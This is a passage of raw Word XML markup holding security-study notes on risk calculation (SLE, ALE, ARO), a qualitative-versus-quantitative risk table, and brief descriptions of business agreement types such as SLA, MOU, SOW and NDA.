      <w:r w:rsidRPr="00DD2FC8">
        <w:t>SLE = Asset Value (AV) x Exposure Fact</w:t>
      </w:r>
      <w:r>
        <w:t>or (EF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2476BD30" w14:textId="4CC235A8" w:rsidR="00DD2FC8" w:rsidRDefault="005E3157" w:rsidP="00DD2FC8">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Annualized Loss Expectancy (ALE) and Annualized Rate of Occur</w:t>
      </w:r>
      <w:r w:rsidR="00030642">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>ence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DA5290" w14:textId="6872E3A6" w:rsidR="003C0F27" w:rsidRPr="005A1CAC" w:rsidRDefault="00030642" w:rsidP="00AF1BBD">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r w:rsidRPr="005A1CAC">
        <w:t>ALE = SLE x ARO</w:t>
      </w:r>
      <w:r w:rsidR="005A1CAC" w:rsidRPr="005A1CAC">
        <w:t xml:space="preserve"> (Annual</w:t>
      </w:r>
      <w:r w:rsidR="005A1CAC">
        <w:t>ized Rate of Occurrenc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6765" w14:paraId="595B1756" w14:textId="77777777" w:rsidTr="00A70063">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="667E577E" w14:textId="0A0E579F" w:rsidR="00396765" w:rsidRPr="007F15A6" w:rsidRDefault="00396765" w:rsidP="007F15A6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7F15A6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Quali</w:t>
            </w:r>
            <w:r w:rsidR="007F15A6" w:rsidRPr="007F15A6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>tative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17EF7B55" w14:textId="374C601A" w:rsidR="00396765" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15A6">
            <w:pPr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7F15A6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Quantitative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396765" w14:paraId="008F6AB0" w14:textId="77777777" w:rsidTr="00A70063">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="169B2592" w14:textId="5D7BC10F" w:rsidR="00396765" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Subjective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58FD1805" w14:textId="62FF484A" w:rsidR="00396765" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396765" w14:paraId="4BCDC31B" w14:textId="77777777" w:rsidTr="00A70063">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18FC8083" w14:textId="56EF2151" w:rsidR="00396765" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Expert judgement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29DAD944" w14:textId="2401FE4B" w:rsidR="00396765" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396765" w14:paraId="47C8BC4D" w14:textId="77777777" w:rsidTr="00A70063">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FC2CA40" w14:textId="47B38CBA" w:rsidR="00396765" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Expert models</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ED5B68A" w14:textId="726AC255" w:rsidR="00396765" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Historical data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F15A6" w14:paraId="53B623C7" w14:textId="77777777" w:rsidTr="00A70063">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15077F62" w14:textId="18B99F29" w:rsidR="007F15A6" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Can suffer from bias</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BAE95D0" w14:textId="6A1011CF" w:rsidR="007F15A6" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Models are key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F15A6" w14:paraId="64E3CC9E" w14:textId="77777777" w:rsidTr="00A70063">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="438A06B9" w14:textId="168CF0A4" w:rsidR="007F15A6" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Risk matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2130B6DC" w14:textId="1ADEDB50" w:rsidR="007F15A6" w:rsidRPr="007F15A6" w:rsidRDefault="007F15A6" w:rsidP="007F15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15A6">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Gathering data can be tricky</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C252952" w14:textId="77777777" w:rsidR="00396765" w:rsidRDefault="00396765" w:rsidP="00396765"/>
    <w:p w14:paraId="5103558F" w14:textId="77777777" w:rsidR="00DC4663" w:rsidRDefault="00DC4663" w:rsidP="00396765"/>
    <w:p w14:paraId="314181AB" w14:textId="66A5BD52" w:rsidR="00884755" w:rsidRPr="00A05553" w:rsidRDefault="00B21845" w:rsidP="00B21845">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc198019381"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Agreement</w:t>
      </w:r>
      <w:r w:rsidR="00AC0203" w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="6F81D542" w14:textId="69D32736" w:rsidR="00B21845" w:rsidRPr="003E5FA0" w:rsidRDefault="00B21845" w:rsidP="00B21845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3E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Service Level Agreement</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SLA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266FA87D" w14:textId="0A9E48A1" w:rsidR="00B21845" w:rsidRDefault="006476E2" w:rsidP="00B21845">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t>- Metrics</w:t>
      </w:r>
      <w:r w:rsidR="00A15DEB">
        <w:t xml:space="preserve"> (reliability</w:t>
      </w:r>
      <w:r w:rsidR="006760A7">
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00A15DEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006760A7">
        <w:t>uptime?</w:t>
      </w:r>
      <w:r w:rsidR="00AC1A5E">
        <w:t xml:space="preserve"> Baselines? Minimum? Maximum?</w:t>
      </w:r>
      <w:r w:rsidR="006760A7">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA07799" w14:textId="187EC559" w:rsidR="00F47355" w:rsidRDefault="006476E2" w:rsidP="00F47355">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>Key Performance Idicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02084780" w14:textId="77777777" w:rsidR="00F47355" w:rsidRPr="003E5FA0" w:rsidRDefault="00F47355" w:rsidP="00F47355">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613071E0" w14:textId="6D924A69" w:rsidR="00F47355" w:rsidRPr="003E5FA0" w:rsidRDefault="00AB71E6" w:rsidP="00F47355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3E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Memorandu</w:t>
      </w:r>
      <w:r w:rsidR="001B1242" w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Agreement</w:t>
      </w:r>
      <w:r w:rsidR="00F47355" w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MOA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D77C4" w14:textId="6D6C9BC8" w:rsidR="00F47355" w:rsidRDefault="00F47355" w:rsidP="00F47355">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00491F28">
        <w:t>Less forma</w:t>
      </w:r>
      <w:r w:rsidR="00D66D64">
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4038686E" w14:textId="04F5AF2F" w:rsidR="00F47355" w:rsidRDefault="00D66D64" w:rsidP="0007057B">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Partner </w:t>
      </w:r>
      <w:r w:rsidR="0007057B">
        <w:t xml:space="preserve">and third-party </w:t>
      </w:r>
      <w:r>
        <w:t>responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1897EDC0" w14:textId="77777777" w:rsidR="001B1242" w:rsidRDefault="001B1242" w:rsidP="0007057B">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB2B760" w14:textId="2ED2D9F1" w:rsidR="001B1242" w:rsidRPr="003E5FA0" w:rsidRDefault="001B1242" w:rsidP="001B1242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3E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Memorandu</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Understanding</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(MO</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A47FE" w14:textId="0158EA00" w:rsidR="00975792" w:rsidRDefault="001B1242" w:rsidP="00975792">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006946A3">
        <w:t>Much more general</w:t>
      </w:r>
      <w:r w:rsidR="00975792">
        <w:t>lization and overview of the partnership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18255A6C" w14:textId="77777777" w:rsidR="00975792" w:rsidRDefault="00975792" w:rsidP="00975792">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07ACD39D" w14:textId="4B87A8E3" w:rsidR="00975792" w:rsidRPr="003E5FA0" w:rsidRDefault="00975792" w:rsidP="00975792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3E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidR="00535491" w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Agreement</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (M</w:t>
      </w:r>
      <w:r w:rsidR="00535491" w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65387AEC" w14:textId="6D2CCAD4" w:rsidR="00975792" w:rsidRDefault="00975792" w:rsidP="00535491">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00535491">
        <w:t>Formal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6084C1C5" w14:textId="3DF4C258" w:rsidR="00E86520" w:rsidRDefault="00E86520" w:rsidP="00535491">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t>- Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D0360" w14:textId="77777777" w:rsidR="00E86520" w:rsidRDefault="00E86520" w:rsidP="00535491">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="565B9CCE" w14:textId="3377D2EE" w:rsidR="00E86520" w:rsidRPr="003E5FA0" w:rsidRDefault="00E86520" w:rsidP="00E86520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3E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Work Order </w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(WO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A444019" w14:textId="6830EC7C" w:rsidR="00E86520" w:rsidRDefault="00E86520" w:rsidP="005F5565">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005F5565">
        <w:t>Transactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C8500" w14:textId="1F41418A" w:rsidR="005F5565" w:rsidRDefault="005F5565" w:rsidP="005F5565">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t>- Third-party</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2F851A" w14:textId="630BB1BC" w:rsidR="001E1842" w:rsidRDefault="001E1842" w:rsidP="005F5565">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t>- Itemized listing of what the third-party is going to do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22702680" w14:textId="3B62D668" w:rsidR="005F5565" w:rsidRDefault="005F5565" w:rsidP="005F5565">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="001E1842">
        <w:t xml:space="preserve">For example: </w:t>
      </w:r>
      <w:r>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidR="001E1842">
        <w:t xml:space="preserve"> of key systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8500B" w14:textId="1A0F3B28" w:rsidR="00E86520" w:rsidRDefault="000F1880" w:rsidP="00535491">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t>- Pricing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EFDB1D" w14:textId="77777777" w:rsidR="000F1880" w:rsidRDefault="000F1880" w:rsidP="00535491">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345663C4" w14:textId="05817D0C" w:rsidR="000F1880" w:rsidRPr="003E5FA0" w:rsidRDefault="000F1880" w:rsidP="000F1880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3E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement of Work </w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SOW</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7567B9F9" w14:textId="6847B89F" w:rsidR="000F1880" w:rsidRDefault="000F1880" w:rsidP="000F1880">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00591B92">
        <w:t>Formal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B8EF2D" w14:textId="5616FE01" w:rsidR="00591B92" w:rsidRDefault="00591B92" w:rsidP="000F1880">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Detailing </w:t>
      </w:r>
      <w:r w:rsidR="002C2769">
        <w:t>exact responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C2C07" w14:textId="77777777" w:rsidR="001C5796" w:rsidRDefault="001C5796" w:rsidP="000F1880">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E09EEC" w14:textId="0E48D60C" w:rsidR="00067DC5" w:rsidRPr="003E5FA0" w:rsidRDefault="00067DC5" w:rsidP="00067DC5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3E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nondisclosure Agreement</w:t>
      </w:r>
      <w:r w:rsidR="001D0A28" w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001D0A28" w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NDA</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A768D77" w14:textId="3521B966" w:rsidR="001961D1" w:rsidRDefault="00067DC5" w:rsidP="00517E95">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00192351">
        <w:t xml:space="preserve">Common sense not sharing </w:t>
      </w:r>
      <w:r w:rsidR="001961D1">
        <w:t>sensitive information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4272012B" w14:textId="77777777" w:rsidR="00517E95" w:rsidRDefault="00517E95" w:rsidP="00517E95">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAB2B3F" w14:textId="37C4C3DC" w:rsidR="001961D1" w:rsidRPr="003E5FA0" w:rsidRDefault="001961D1" w:rsidP="001961D1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3E5FA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Business Partners Agreement</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BPA</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5FA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7926A868" w14:textId="1DF5D9FD" w:rsidR="001961D1" w:rsidRDefault="001961D1" w:rsidP="00304E3C">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00304E3C">
        <w:t>Document when we full part</w:t>
      </w:r>
      <w:r w:rsidR="005A4528">
        <w:t>ner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5A96DB" w14:textId="77777777" w:rsidR="001961D1" w:rsidRDefault="001961D1" w:rsidP="001961D1"/>
    <w:p w14:paraId="2B3192FC" w14:textId="77777777" w:rsidR="00067DC5" w:rsidRDefault="00067DC5" w:rsidP="000F1880">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C03F269" w14:textId="77777777" w:rsidR="000F1880" w:rsidRDefault="000F1880" w:rsidP="00535491">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CAD042F" w14:textId="77777777" w:rsidR="001B1242" w:rsidRDefault="001B1242" w:rsidP="001B1242"/>
    <w:p w14:paraId="1F21A6AD" w14:textId="4F0B0FB6" w:rsidR="00F47355" w:rsidRDefault="00F47355" w:rsidP="00F47355"/>
    <w:p w14:paraId="7FE8D29C" w14:textId="77777777" w:rsidR="001A4B65" w:rsidRDefault="001A4B65" w:rsidP="00F47355"/>
    <w:p w14:paraId="5B6B1155" w14:textId="77777777" w:rsidR="001A4B65" w:rsidRDefault="001A4B65" w:rsidP="00F47355"/>
    <w:p w14:paraId="51D7D244" w14:textId="77777777" w:rsidR="001A4B65" w:rsidRPr="00B21845" w:rsidRDefault="001A4B65" w:rsidP="00F47355"/>
    <w:sectPr w:rsidR="001A4B65" w:rsidRPr="00B21845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1AF3D" w14:textId="77777777" w:rsidR="002F6E0D" w:rsidRPr="005B4891" w:rsidRDefault="002F6E0D" w:rsidP="000910D5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0AB92DF0" w14:textId="77777777" w:rsidR="002F6E0D" w:rsidRPr="005B4891" w:rsidRDefault="002F6E0D" w:rsidP="000910D5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="6ADB34D9" w14:textId="77777777" w:rsidR="002F6E0D" w:rsidRPr="005B4891" w:rsidRDefault="002F6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7234183"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="19C261CC" w14:textId="45CCC944" w:rsidR="001A63C2" w:rsidRPr="005B4891" w:rsidRDefault="001A63C2">
        <w:pPr>
          <w:pStyle w:val="Bunntekst"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r w:rsidRPr="005B4891">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="005B4891">
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidRPr="005B4891">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="005B4891">
